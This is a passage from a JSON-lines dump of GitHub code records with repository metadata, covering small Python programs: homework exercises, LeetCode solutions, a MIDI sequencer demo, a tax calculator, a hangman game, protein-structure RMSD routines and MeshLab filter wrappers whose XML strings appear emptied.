34\nE-mail: mpasupu1@umbc.edu\nDescription: This program will print the numbers from 1 up to a value\nsupplied by the user\n\"\"\"\nif __name__ == \"__main__\":\n start = 1\n upper_limit = int(input(\"What is the upper limit? \"))\n for i in range(start, upper_limit):\n if i % 3 == 0 and i % 4 == 0:\n print(\"This is a very special time, savor it.\")\n elif i % 3 == 0 and i % 4 != 0:\n print(\"One time I saw three hawks piled on a cactus\")\n elif i % 4 == 0 and i % 3 != 0:\n print(\"Four, What is it good for? Absolutely nothing!\")\n else:\n print(i)","repo_name":"Denish-Pasupuleti/UG_Projects","sub_path":"201-Python/Homeworks/hw4/hw4_part5.py","file_name":"hw4_part5.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39162648834","text":"from typing import List\n\n\nclass Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n count = 0\n\n for num in nums:\n if num != val:\n nums[count] = num\n count += 1\n\n return count\n\n\nif __name__ == '__main__':\n z, v = [4, 5, 5], 5\n so = Solution()\n print(so.removeElement(z, v))\n","repo_name":"BiqiangWang/leetcode","sub_path":"DataStructure/array/27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30552055564","text":"# --------------------------------------------------------------\n# Warp API Demo\n# (C) Michael DeHaan , 2020\n# --------------------------------------------------------------\n#\n# this demo shows how transforms work (see docs!) 
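`start_main` above trains through `ImageDataGenerator.flow`, so each batch is randomly rotated and flipped on the fly. A quick shape check of that generator on random stand-in data (Keras required; dimensions mirror the 32x32 flower images, data and labels are invented):

```python
import numpy as np
from keras.preprocessing.image import ImageDataGenerator

aug = ImageDataGenerator(rotation_range=180, horizontal_flip=True,
                         vertical_flip=True)
x = np.random.rand(8, 32, 32, 3)            # stand-in for the flower images
y = np.eye(5)[np.random.randint(0, 5, 8)]   # one-hot labels, 5 classes
batch_x, batch_y = next(aug.flow(x, y, batch_size=4))
print(batch_x.shape, batch_y.shape)  # (4, 32, 32, 3) (4, 5)
```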
and how\n# to build a simple arpeggiator, as well as other MIDI effects.\n#\n# warning: as with all demos, whether these demos sound\n# musical may vary based on your chosen instruments! These are mostly\n# to illustrate concepts, and the compositions are up to you.\n\nfrom warpseq.api import demo\nfrom warpseq.api.public import Api as WarpApi\n\n# setup API and song\napi = WarpApi()\napi.song.edit(tempo=60)\n\n# setup instruments\nDEVICE = demo.suggest_device(api, 'IAC Driver IAC Bus 1')\napi.instruments.add('lead_inst', device=DEVICE, channel=1, min_octave=0, base_octave=4, max_octave=10)\n\n# setup tracks\napi.tracks.add(name='lead', instrument='lead_inst', muted=False)\n\n# setup scales\napi.scales.add(name='C-major', note='C', octave=0, scale_type='major')\napi.scales.add(name='C-minor', note='C', octave=0, scale_type='natural_minor')\n\n# setup patterns\napi.patterns.add(name='basic', slots=['1', '2', '3', '4', '5', '6', '7', '8' ])\napi.patterns.add(name='chords', slots=['I', 'IV', 'VI', 'VI', 'IV:power', '5 ch=power'])\n\n\n# setup scenes\napi.scenes.add(name='scene_1', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_2', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_3', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_4', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_5', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_6', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_7', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_8', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_9', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_10', rate=0.5, auto_advance=True)\napi.scenes.add(name='scene_END', rate=0.5, auto_advance=True)\n\n# setup transforms\n# arpeggiate chords only - auto-divide chords regardless of length so each 1/16 note plays each note in the chord. 
Triads will strum faster than power chords, etc.\napi.transforms.add(name='basic arp', slots=['1'], divide=3, applies_to='chords')\n# play two copies of the chord, the second one octave up\napi.transforms.add(name='octave arp', slots=['1','1','1','O+1','O+1','O+1'], divide=3)\n# play each note in a triad with diminished velocity (this might not be audible, depending on your synth settings)\napi.transforms.add(name='velocity arp', slots=['1 v=120','1 v=100','1 v=80'], divide=3)\n# play each note in a triad with different MIDI CC values for MIDI CC 1\napi.transforms.add(name='midi cc arp', slots=['1 cc1=80', '1 cc1=100', '1 cc1=20:100'], divide=3)\n# take the base note of a pattern and then play it faster, shifting the scale notes to form a bassline\napi.transforms.add(name='bassline', slots=['1','S+4','S+5','S+2','S+4','S+5','1'], divide=5)\n# play the second note of a triad or pattern one note up, the second two notes up\napi.transforms.add(name='octave ramp', slots=['1','O+1','O+2'], divide=1)\n# quickly repeat the notes with alternating silence, the last repeat is only randomly silent\napi.transforms.add(name='stutter', slots=['1','x','1','x','1','p=0.5 x'], divide=6, applies_to='notes')\n# turn whatever is playing into chords, or change the active chord type\napi.transforms.add(name='chordify', slots=['ch=major', 'ch=minor'])\n\n# setup clips\napi.clips.add(name='chord strum', scene='scene_1', track='lead', scales=['C-major'], patterns=['chords'], transforms=['basic arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='chord octaves', scene='scene_2', track='lead', scales=['C-major'], patterns=['chords'], transforms=['octave arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='chord velocity', scene='scene_3', track='lead', scales=['C-major'], patterns=['chords'], transforms=['velocity arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='chord ccs', scene='scene_4', track='lead', scales=['C-major'], patterns=['chords'], transforms=['midi cc arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='melody to bassline', scene='scene_5', track='lead', scales=['C-major'], patterns=['basic'], transforms=['bassline'], repeat=1, auto_scene_advance=True)\n\n# the transforms can be expressed in a list, the next item in the transform list will be chosen as the patterns advance and repeat\n# if any item in the list IS a list, both of those transforms will be applied in order against the currently playing pattern\napi.clips.add(name='melody octave adjustment, then stutter', scene='scene_6', track='lead', scales=['C-major'], patterns=['basic'], transforms=['octave ramp', 'stutter'], repeat=2, auto_scene_advance=True)\napi.clips.add(name='stacked transforms', scene='scene_7', track='lead', scales=['C-major'], patterns=['basic'], transforms=[['octave ramp','stutter'],'bassline',['octave arp','basic arp']], repeat=3, auto_scene_advance=True)\napi.clips.add(name='just arp the chords', scene='scene_8', track='lead', scales=['C-major'], patterns=['chords','basic'], transforms=['basic arp'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='just tweak the notes', scene='scene_9', track='lead', scales=['C-major'], patterns=['chords','basic'], transforms=['stutter'], repeat=1, auto_scene_advance=True)\napi.clips.add(name='transform melody to chords then arp', scene='scene_10', track='lead', scales=['C-major'], patterns=['basic'], transforms=[['chordify','basic arp']], repeat=1, auto_scene_advance=True)\n\n# play starting on the first scene - Ctrl+C to 
exit.\napi.player.loop('scene_1')\n","repo_name":"simianterminal/warpseq","sub_path":"examples/api/04_transforms.py","file_name":"04_transforms.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"7617962915","text":"import numpy as np\n\ndef calculate_tax_rates(x,bands,maxAllowance=123000):\n \n taxBands = np.diff([0] + [k[0] for k in bands])\n taxRates = np.array([k[1] for k in bands])\n \n # tapering personal allowance\n taperedPA = np.max([0,x-maxAllowance])\n adjustedPA = taxBands[0] - taperedPA/2\n taxBands[0] = np.max([0,adjustedPA])\n \n payInBand = np.zeros(len(bands))\n remaining = x\n for i,band in enumerate(taxBands):\n \n inBand = remaining if band > remaining else band\n remaining -= inBand\n \n payInBand[i] = inBand\n \n if remaining == 0:\n break\n \n \n if x > maxAllowance:\n taxRates[0] = taxRates[1]\n \n totalTaxes = taxRates.dot(payInBand)\n \n return totalTaxes\n\ndef scotland_2018(x):\n band0 = (11850,0.0) # personal allowance\n band1 = (13850,0.19)\n band2 = (24000,0.2)\n band3 = (44273,0.21)\n band4 = (150000,0.41)\n band5 = (np.inf,0.46)\n \n bands = [band0,band1,band2,band3,band4,band5]\n return calculate_tax_rates(x,bands)\n\ndef scotland_2017(x):\n band0 = [11500,0.0]\n band1 = [43000,0.2]\n band2 = [150000,0.4]\n band3 = [np.inf,0.45]\n\n bands = [band0,band1,band2,band3]\n\n return calculate_tax_rates(x,bands)\n\ndef ruk_2018(x):\n band0 = [11850,0.0] # personal allowance\n band1 = [46350,0.2]\n band2 = [150000,0.4]\n band3 = [np.inf,0.45]\n \n bands = [band0,band1,band2,band3]\n return calculate_tax_rates(x,bands)\n\ndef ruk_2017(x):\n band0 = [11500,0.0]\n band1 = [45000,0.2]\n band2 = [150000,0.4]\n band3 = [np.inf,0.45]\n \n bands = [band0,band1,band2,band3]\n return calculate_tax_rates(x,bands)\n\ndef national_insurance(x):\n band0 = [8164,0.0]\n band1 = [45032,0.12]\n band2 = [np.inf,0.02]\n\n bands = [band0,band1,band2]\n return calculate_tax_rates(x,bands)\n","repo_name":"sidhenriksen/taxcalc","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6222477039","text":"class Solution:\n # @param s, a string\n # @return an integer\n def numDecodings(self, s):\n n = len(s)\n if n == 0:\n return 0\n dp = [ 0 for i in range(n + 1) ]\n dp[0] = 1\n for i in range(1, n + 1):\n if i == 1:\n dp[i] = 1 if int(s[0]) >= 1 else 0\n continue\n if str(int(s[i-2:i])) == s[i-2:i] and int(s[i-2:i]) <= 26:\n dp[i] += dp[i-2]\n if int(s[i-1:i]) >= 1:\n dp[i] += dp[i-1]\n return dp[n]","repo_name":"Shuaiyicao/leetcode-python","sub_path":"91.py","file_name":"91.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26766138855","text":"import urllib.request\nimport os\n\ndef cls():\n\tos.system('cls' if os.name=='nt' else 'clear')\n\ndef main_menu () :\n\tplay=1\n\twhile play>0:\n\t\tprint(\"\"\"Добро пожаловать в игру \"\"Виселица\"\"!\\n Пожалуйста, выберите нужный пункт меню:\n\t\t1) Новая игра\n\t\t2) Настройки\n\t\t3) Выход\"\"\",\"\\n \")\n\tmode=input(\"Ваш выбор: \")\n\tif mode==\"1\":\n\t import viselica\n\telif mode==\"2\":\n\t print(\"Меню настроек:\\n#пока находится в тестовом режиме#\\n \")\n\telse:\n\t play=0\n\t print(\"Спасибо что зашли на огонек! 
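`calculate_tax_rates` in tax.py above fills income into marginal bands derived with `np.diff` of the band ceilings and dots the per-band amounts with the rates. A hand-checkable miniature of that marginal-band logic; the bands here are invented, not the Scottish or rUK ones:

```python
import numpy as np

def marginal_tax(income, bands):
    """bands: ascending list of (upper_limit, rate); last limit may be np.inf."""
    widths = np.diff([0.0] + [upper for upper, _ in bands])  # band sizes
    rates = np.array([rate for _, rate in bands])
    pay_in_band = np.zeros(len(bands))
    remaining = income
    for i, width in enumerate(widths):
        pay_in_band[i] = min(remaining, width)
        remaining -= pay_in_band[i]
        if remaining <= 0:
            break
    return float(rates @ pay_in_band)

bands = [(10_000, 0.0), (50_000, 0.20), (np.inf, 0.40)]  # invented bands
print(marginal_tax(60_000, bands))  # 0.2*40_000 + 0.4*10_000 = 12_000.0
```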
Досвидания\")\n\ndef drow_word (secret_word, user_letters ):\n\tword_to_drow = []\n\tfor letter in secret_word :\n\t\tif letter in user_letters :\n\t\t\tword_to_drow.append(letter)\n\t\telse :\n\t\t\tword_to_drow.append(\"_\")\n\treturn ''.join(word_to_drow)\n\ndef main():\n\tslovo = urllib.request.urlopen(\"http://www.setgetgo.com/randomword/get.php?q=4\").read().decode(\"utf-8\").lower()\n\tprint(slovo)\n\tt=7\n\tm=1\n\ti=0\n\tlet=''\n\tspace=(' ')\n\tprint (drow_word(slovo, let))\n\twhile t>0:\n\t\tprint('\\nу вас ',t,' попыток') \n\t\tlet1=input('введите букву: ')\n\t\tif slovo.find(let1)!=-1 and len(let1)==1 and let1.isdigit()==False and let.find(let1)==-1:\n\t\t\tcls()\n\t\t\tprint(drow_word(slovo, let + let1))\n\t\telif let1.isdigit()==True or len(let1)!=1:\n\t\t\tprint(\"Мы играем в слова! Попробуйте ввести одну букву снова.\")\n\t\telif let.find(let1)>-1:\n\t\t\tprint('Вы уже выбирали эту букву. Попробуйте другую.')\n\t\telse:\n\t\t\tt-=1\n\t\t\tprint('НЕ УГАДАЛ!! Попытайся еще!')\n\t\tlet=let + let1\n\t\tif set(let).intersection(set(slovo)) == set(slovo):\n\t\t\tprint(\"Поздравляем! Вы выиграли, и на этот раз виселится останется без работы =(\")\n\t\t\tbreak\n\telse:\n\t\tprint(\"Вы проиграли!\")\n\t\tprint(\"Ответ был: \",slovo,'\\n')\n\tch=input(\"Хотели бы вы сыграть еще раз?(Y/N)\")\n\twhile m!=0:\n\t\tif ch.lower()==\"y\":\n\t\t\tm-=1\n\t\telif ch.lower()==\"n\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Y или N... других ответов НЕТ!\") \n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"bagum4eg/Gallows","sub_path":"gallows.py","file_name":"gallows.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22872813078","text":"import numba as nb\nimport numpy as np\n\n\n@nb.njit\n# @numba_cc.export('normalize', 'f64[:](f64[:])')\ndef normalize(numbers):\n minv, maxv = np.min(numbers), np.max(numbers)\n return (numbers - minv) / (maxv - minv)\n\n\n@nb.njit\n# @numba_cc.export('nb_mean_axis_0', 'f64[:](f64[:])')\ndef nb_mean_axis_0(array: np.ndarray) -> np.ndarray:\n \"\"\"\n Same as np.mean(array, axis=0) but njitted\n \"\"\"\n mean_array = np.zeros(array.shape[1])\n for i in range(array.shape[1]):\n mean_array[i] = np.mean(array[:, i])\n return mean_array\n\n\n@nb.njit\n# @numba_cc.export('svd_superimpose', '(f64[:], f64[:])')\ndef svd_superimpose(coords_1: np.ndarray, coords_2: np.ndarray):\n \"\"\"\n Superimpose paired coordinates on each other using svd\n\n Parameters\n ----------\n coords_1\n numpy array of coordinate data for the first protein; shape = (n, 3)\n coords_2\n numpy array of corresponding coordinate data for the second protein; shape = (n, 3)\n\n Returns\n -------\n rotation matrix, translation matrix for optimal superposition\n \"\"\"\n centroid_1, centroid_2 = nb_mean_axis_0(coords_1), nb_mean_axis_0(coords_2)\n coords_1_c, coords_2_c = coords_1 - centroid_1, coords_2 - centroid_2\n correlation_matrix = np.dot(coords_2_c.T, coords_1_c)\n u, s, v = np.linalg.svd(correlation_matrix)\n reflect = np.linalg.det(u) * np.linalg.det(v) < 0\n if reflect:\n s[-1] = -s[-1]\n u[:, -1] = -u[:, -1]\n rotation_matrix = np.dot(u, v)\n translation_matrix = centroid_1 - np.dot(centroid_2, rotation_matrix)\n return rotation_matrix.astype(np.float64), translation_matrix.astype(np.float64)\n\n\n@nb.njit\n# @numba_cc.export('apply_rotran', '(f64[:], f64[:], f64[:])')\ndef apply_rotran(coords: np.ndarray, rotation_matrix: np.ndarray, translation_matrix: np.ndarray) -> 
np.ndarray:\n \"\"\"\n Applies a rotation and translation matrix onto coordinates\n\n Parameters\n ----------\n coords\n rotation_matrix\n translation_matrix\n\n Returns\n -------\n transformed coordinates\n \"\"\"\n return np.dot(coords, rotation_matrix) + translation_matrix\n\n\n# @numba_cc.export('superpose_with_pos', '(f64[:], f64[:], f64[:], f64[:])')\n@nb.njit\ndef superpose_with_pos(coords_1, coords_2, common_coords_1, common_coords_2):\n \"\"\"\n Superpose two sets of un-aligned coordinates using smaller subsets of aligned coordinates\n\n Parameters\n ----------\n coords_1\n coords_2\n common_coords_1\n common_coords_2\n\n Returns\n -------\n superposed coord_1, superposed coords_2, superposed common_coords_2\n \"\"\"\n rot, tran = svd_superimpose(common_coords_1, common_coords_2)\n coords_1 = coords_1 - nb_mean_axis_0(common_coords_1)\n coords_2 = np.dot(coords_2 - nb_mean_axis_0(common_coords_2), rot)\n common_coords_2_rot = apply_rotran(common_coords_2, rot, tran)\n return coords_1, coords_2, common_coords_2_rot\n\n\n@nb.njit\n# @numba_cc.export('make_distance_matrix', '(f64[:], f64[:], f64, b1)')\ndef make_distance_matrix(coords_1: np.ndarray, coords_2: np.ndarray, gamma, normalized=False) -> np.ndarray:\n \"\"\"\n Makes matrix of euclidean distances of each coordinate in coords_1 to each coordinate in coords_2\n TODO: probably faster to do upper triangle += transpose\n Parameters\n ----------\n coords_1\n shape = (n, 3)\n coords_2\n shape = (m, 3)\n gamma\n normalized\n Returns\n -------\n matrix; shape = (n, m)\n \"\"\"\n distance_matrix = np.zeros((coords_1.shape[0], coords_2.shape[0]))\n for i in range(coords_1.shape[0]):\n for j in range(coords_2.shape[0]):\n distance_matrix[i, j] = np.exp(-gamma * np.sum((coords_1[i] - coords_2[j]) ** 2, axis=-1))\n if normalized:\n return normalize(distance_matrix)\n else:\n return distance_matrix\n\n\n@nb.njit\n# @numba_cc.export('get_rmsd', '(f64[:], f64[:])')\ndef get_rmsd(coords_1: np.ndarray, coords_2: np.ndarray) -> float:\n \"\"\"\n RMSD of paired coordinates = normalized square-root of sum of squares of euclidean distances\n \"\"\"\n return np.sqrt(np.sum((coords_1 - coords_2) ** 2) / coords_1.shape[0])\n\n\n@nb.njit\n# @numba_cc.export('get_caretta_score', '(f64[:], f64[:], f64, b1)')\ndef get_caretta_score(coords_1: np.ndarray, coords_2: np.ndarray, gamma, normalized) -> float:\n \"\"\"\n Get caretta score for a a set of paired coordinates\n\n Parameters\n ----------\n coords_1\n coords_2\n gamma\n normalized\n\n Returns\n -------\n Caretta score\n \"\"\"\n score = 0\n for i in range(coords_1.shape[0]):\n score += np.exp(\n -gamma * np.sum((coords_1[i] - coords_2[i]) ** 2, axis=-1))\n if normalized:\n return score / coords_1.shape[0]\n else:\n return score\n\n\n\n","repo_name":"n-canter/gamaps","sub_path":"gaCaretta/caretta/rmsd_calculations.py","file_name":"rmsd_calculations.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25140340575","text":"class Data:\n def __init__(self, data):\n self.data = data\n\n @classmethod\n def format_data(cls, data):\n if data.replace('-', '').isdigit():\n return int(data.replace('-', ''))\n else:\n return 'Нужно вводить число в формате дд-мм-гггг!!! 
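`svd_superimpose` above is the classic Kabsch algorithm: centre both point sets, take the SVD of the correlation matrix, fix any reflection via the determinant check, and compose rotation plus translation. A numpy-only sketch that recovers a known rotation (no numba needed for the demo; the point cloud and rotation are invented):

```python
import numpy as np

def kabsch(coords_1, coords_2):
    """Rotation/translation mapping coords_2 onto coords_1, using the same
    convention as svd_superimpose: apply as coords_2 @ rot + tran."""
    c1, c2 = coords_1.mean(axis=0), coords_2.mean(axis=0)
    corr = (coords_2 - c2).T @ (coords_1 - c1)
    u, s, vh = np.linalg.svd(corr)
    if np.linalg.det(u) * np.linalg.det(vh) < 0:  # reject reflections
        u[:, -1] = -u[:, -1]
    rot = u @ vh
    return rot, c1 - c2 @ rot

rng = np.random.default_rng(0)
pts = rng.normal(size=(20, 3))
theta = 0.7
true_rot = np.array([[np.cos(theta), -np.sin(theta), 0.0],
                     [np.sin(theta),  np.cos(theta), 0.0],
                     [0.0, 0.0, 1.0]])
moved = pts @ true_rot + np.array([1.0, -2.0, 0.5])
rot, tran = kabsch(pts, moved)
print(np.allclose(moved @ rot + tran, pts))  # True: transform recovered
```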
Ничего другого вводить нельзя'\n\n @staticmethod\n def validation(data):\n\n a = data.replace('-', '')\n if a.isdigit():\n if (int(a[:2]) > 31) or (int(a[:2]) < 1):\n print(\"Дни бывают от 1 до 31\")\n if (int(a[2:4]) > 12) or (int(a[2:4]) < 1):\n print(\"Месяцы бывают от 1 до 12\")\n if int(a[4:]) < 1000:\n print(\"Мы работаем с датами настоящего и прошлого тысячелетия!!!\")\n if (int(a[2:4]) < 13) and (int(a[2:4]) > 0) and (int(a[:2]) < 32) and (int(a[:2]) > 0):\n print('Валидация пройдена!!')\n\n else:\n print('Нужно вводить число в формате дд-мм-гггг!!! Ничего другого вводить нельзя')\n\n\ndate = input('Введите дату в формате дд-мм-гггг: ')\n\nprint(\"Используем @classmethod\")\nprint(Data.format_data(date))\nprint(type(Data.format_data(date)))\nprint()\nprint(\"Используем @staticmethod\")\nData.validation(date)\n","repo_name":"Sashagrande/Faculty-of-AI","sub_path":"Lesson_8/task-1.py","file_name":"task-1.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16859425681","text":"import sys\r\n\r\ninput = sys.stdin.readline\r\n\r\n\r\nN, M = map(int, input().split())\r\n\r\narr = [list(map(int, input().split())) for _ in range(N)]\r\nK = int(input())\r\n\r\nlocations = [list(map(lambda x: int(x)-1, input().split())) for _ in range(K)]\r\n\r\nfor loc in locations:\r\n sum_arr = 0\r\n for i in range(loc[0], loc[2] + 1): # x\r\n for j in range(loc[1], loc[3] + 1): # y\r\n sum_arr += arr[i][j]\r\n print(sum_arr)","repo_name":"MHK183/Practice_Algorithms","sub_path":"백준/Silver/2167. 2차원 배열의 합/2차원 배열의 합.py","file_name":"2차원 배열의 합.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10041203733","text":"\"\"\" MeshLabXML functions to transfer attributes \"\"\"\n\nfrom . 
import util\n\n\ndef tex2vc(script):\n \"\"\"Transfer texture colors to vertex colors\n\n BUG: this does not work correctly if the file has multiple textures; it\n only uses one texture and remaps all of the UVs to that\n https://github.com/cnr-isti-vclab/meshlab/issues/124\n should be fixed in post 2016.12 release\n\n \"\"\"\n filter_xml = ' \\n'\n util.write_filter(script, filter_xml)\n return None\n\n\ndef vc2tex(script, tex_name='TEMP3D_texture.png', tex_width=1024,\n tex_height=1024, overwrite_tex=False, assign_tex=False,\n fill_tex=True):\n \"\"\"Transfer vertex colors to texture colors\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n tex_name (str): The texture file to be created\n tex_width (int): The texture width\n tex_height (int): The texture height\n overwrite_tex (bool): If current mesh has a texture will be overwritten (with provided texture dimension)\n assign_tex (bool): Assign the newly created texture\n fill_tex (bool): If enabled the unmapped texture space is colored using a pull push filling algorithm, if false is set to black\n \"\"\"\n if script.ml_version == '1.3.4BETA':\n filter_name = 'Vertex Color to Texture'\n else:\n filter_name = 'Transfer: Vertex Color to Texture'\n filter_xml = ''.join([\n ' \\n' % filter_name,\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n\n\ndef fc2vc(script):\n \"\"\"Transfer face colors to vertex colors\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n \"\"\"\n filter_xml = ' \\n'\n util.write_filter(script, filter_xml)\n return None\n\n\ndef vc2fc(script):\n \"\"\"Transfer vertex colors to face colors\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n \"\"\"\n filter_xml = ' \\n'\n util.write_filter(script, filter_xml)\n return None\n\n\ndef mesh2fc(script, all_visible_layers=False):\n \"\"\"Transfer mesh colors to face colors\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n all_visible_layers (bool): If true the color mapping is applied to all the meshes\n \"\"\"\n filter_xml = ''.join([\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n\n\ndef vert_attr_2_meshes(script, source_mesh=0, target_mesh=1,\n geometry=False, normal=False, color=True,\n quality=False, selection=False,\n quality_distance=False, max_distance=0.5):\n \"\"\"Vertex Attribute Transfer (between 2 meshes)\n\n Transfer the chosen per-vertex attributes from one mesh to another. Useful to transfer attributes to different representations of the same object. For each vertex of the target mesh the closest point (not vertex!) 
on the source mesh is computed, and the requested interpolated attributes from that source point are copied into the target vertex.\n\n The algorithm assumes that the two meshes are reasonably similar and aligned.\n\n UpperBound: absolute value (not percentage)\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n source_mesh (int): The mesh that contains the source data that we want to transfer\n target_mesh (int): The mesh whose vertexes will receive the data from the source\n geometry (bool): If enabled, the position of each vertex of the target mesh will be snapped onto the corresponding closest point on the source mesh\n normal (bool): If enabled, the normal of each vertex of the target mesh will get the (interpolated) normal of the corresponding closest point on the source mesh\n color (bool): If enabled, the color of each vertex of the target mesh will become the color of the corresponding closest point on the source mesh\n quality (bool): If enabled, the quality of each vertex of the target mesh will become the quality of the corresponding closest point on the source mesh\n selection (bool): If enabled, each vertex of the target mesh will be selected if the corresponding closest point on the source mesh falls in a selected face\n quality_distance (bool): If enabled, we store the distance of the transferred value as in the vertex quality\n max_distance (float): Sample points for which we do not find anything within this distance are rejected and not considered for recovering attributes\n\n \"\"\"\n filter_xml = ''.join([\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n\n\ndef vert_attr2tex_2_meshes(script, source_mesh=0, target_mesh=1, attribute=0,\n max_distance=0.5, tex_name='TEMP3D_texture.png',\n tex_width=1024, tex_height=1024,\n overwrite_tex=True, assign_tex=False,\n fill_tex=True):\n \"\"\"Transfer Vertex Attributes to Texture (between 2 meshes)\n\n Target mesh must be saved to disk or filter will fail\n\n Created texture seems to be created with absolute pathname. To set relative pathname,\n use mlx.texture.set_texture afterwards\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n source_mesh (int): The mesh that contains the source data that we want to transfer\n target_mesh (int): The mesh whose texture will be filled according to source mesh data\n attribute (int): Choose what attribute has to be transferred onto the target texture. 
You can choose between Per vertex attributes (color, normal, quality) or to transfer color information from source mesh texture\n max_distance (float): Sample points for which we do not find anything within this distance are rejected and not considered for recovering data\n tex_name (str): The texture file to be created\n tex_width (int): The texture width\n tex_height (int): The texture height\n overwrite_tex (bool): If target mesh has a texture will be overwritten (with provided texture dimension)\n assign_tex (bool): Assign the newly created texture to target mesh\n fill_tex (bool): If enabled the unmapped texture space is colored using a pull push filling algorithm, if false is set to black\n\n Layer stack:\n No impacts\n\n MeshLab versions:\n 2016.12\n 1.3.4BETA\n \"\"\"\n if script.ml_version == '1.3.4BETA':\n filter_name = 'Transfer Vertex Attributes to Texture (between 2 meshes)'\n else:\n filter_name = 'Transfer: Vertex Attributes to Texture (1 or 2 meshes)'\n filter_xml = ''.join([\n ' \\n'.format(filter_name),\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n\n\ndef tex2vc_2_meshes(script, source_mesh=0, target_mesh=1, max_distance=0.5):\n \"\"\"Transfer texture colors to vertex colors (between 2 meshes)\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n source_mesh (int): The mesh with associated texture that we want to sample from\n target_mesh (int): The mesh whose vertex color will be filled according to source mesh texture\n max_distance (float): Sample points for which we do not find anything within this distance are rejected and not considered for recovering color\n\n Layer stack:\n No impacts\n\n MeshLab versions:\n 2016.12\n 1.3.4BETA\n \"\"\"\n if script.ml_version == '1.3.4BETA':\n filter_name = 'Texture to Vertex Color (between 2 meshes)'\n else:\n filter_name = 'Transfer: Texture to Vertex Color (1 or 2 meshes)'\n filter_xml = ''.join([\n ' \\n'.format(filter_name),\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n","repo_name":"3DLIRIOUS/MeshLabXML","sub_path":"meshlabxml/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":13554,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"53"} +{"seq_id":"3831451670","text":"import numpy as np\nimport corpora\nimport utils\nfrom sklearn import metrics\nfrom network import Network\nfrom joblib import Parallel, delayed\nimport joblib\n\n\ndef extract_boundaries(corpus):\n \"\"\"Returns a corpus with boundaries removed, and boundary markers.\n\n XABXDEFXHXIJKLX -> ABDEFHIJKL, 0100110001\"\"\"\n pairs = utils.neighbors(corpus)\n phones_and_boundaries = ((phone, nxt in 'XQ') # phone, precedes_boundary\n for phone, nxt in pairs # for all adjacent pairs\n if phone != 'X') # except ones that lead with a boundary\n return phones_and_boundaries\n\ndef prepare(corpus, distributed):\n # Nets are trained to predict the next phoneme.\n inputs, targets = zip(*utils.neighbors(corpus))\n\n # Encode phonemes into numeric representations.\n encoding = corpora.get_encoding(distributed=distributed)\n\n return [encoding[c] for c in inputs], [encoding[c] for c in targets]\n\n\ndef get_corpora(lang, num_train=500000, num_test=10000, distributed=False):\n full_corpus = corpora.get_corpus(lang, word_boundaries=True)\n\n # A list of (phoneme, precedes_boundary) tuples.\n 
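The SRN script above leans on a `utils.neighbors` helper that is not shown in this file; judging from how `extract_boundaries` and `prepare` consume it, it yields consecutive pairs. A minimal stand-in (an assumption about that API, not the repo's actual code):

import itertools

def neighbors(seq):
    # assumed behavior of utils.neighbors: consecutive (current, next) pairs
    a, b = itertools.tee(seq)
    next(b, None)  # advance the second iterator by one element
    return zip(a, b)

assert list(neighbors('ABC')) == [('A', 'B'), ('B', 'C')]
# With this pairing, extract_boundaries('XABXDEFXHXIJKLX') yields the phones
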